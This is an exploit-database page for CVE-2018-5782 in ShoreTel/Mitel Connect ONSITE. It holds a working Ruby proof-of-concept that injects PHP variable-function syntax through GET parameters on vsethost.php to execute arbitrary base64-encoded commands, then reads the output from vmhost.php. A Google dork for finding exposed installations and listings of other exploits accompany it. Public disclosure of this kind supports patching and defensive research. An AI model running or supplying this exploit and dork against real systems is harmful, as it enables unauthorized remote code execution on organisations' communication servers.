Menu

Search for hundreds of thousands of exploits

"ShoreTel / Mitel Connect ONSITE 19.49.5200.0 - Remote Code Execution"

Author

Exploit author

twosevenzero

Platform

Exploit platform

php

Release date

Exploit published date

2019-01-16

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
# Exploit Title: ShoreTel / Mitel Connect ONSITE ST14.2 Remote Code Execution
# Google Dork: +"Public" +"My Conferences" +"Personal Library" +"My Profile" +19.49.5200.0
# Date: 01-01-2019
# Exploit Author: twosevenzero
# Vendor Homepage: https://www.mitel.com/
# Version: 19.49.5200.0 (and very likely many others prior and after)
# CVE : CVE-2018-5782 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5782)

Description
===========
There are multiple vulnerabilities in ShoreTel/Mitel Connect ONSITE ST 14.2
which, when chained together, result in remote code execution in the
context of the running service. The vendor was contacted by Jared McLaren
of SecureWorks in early 2018 but a proof of concept was not released. I had
access to a single device during the development of this exploit. As such,
your system paths may be different and you may need to edit this script to
fit your needs.

Solution
========
The vendor has released a response stating that the newest versions are not
affected. Please see their response for upgrade instructions.

https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-18-0004

#!/usr/bin/env ruby

require "base64"
require "methadone"
require "faraday"

include Methadone::Main
include Methadone::CLILogging

main do |base_url,command|

  cmd_b64 = Base64.strict_encode64(command.strip)

  conn = Faraday.new(:url => base_url.strip)
  res = conn.get do |req|
    req.url "/scripts/vsethost.php", 
      {
        :hostId => "system",
        :keyCode => "base64_decode",
        :meetingType => "{${gKeyCode}($gSessionDir)}",
        :sessionDir => cmd_b64,
        :swfServer => "{${gHostID}($gMeetingType)}",
        :server => "exec",
        :dir => "/usr/share/apache2/htdocs/wc2_deploy/scripts/"
      }
  end

  rce = conn.get do |req|
    req.url "/scripts/vmhost.php"
  end

  print rce.body.to_s
end

version       "0.1.0"
description   "Shoretel/Mitel Connect Onsite ST 14.2 Remote Code Execution PoC"

arg :base_url, "URL of vulnerable Connect Onsite ST 14.2 Installation."
arg :command, "Command to run."

go!
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2019-01-16 "ShoreTel / Mitel Connect ONSITE 19.49.5200.0 - Remote Code Execution" webapps php twosevenzero 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected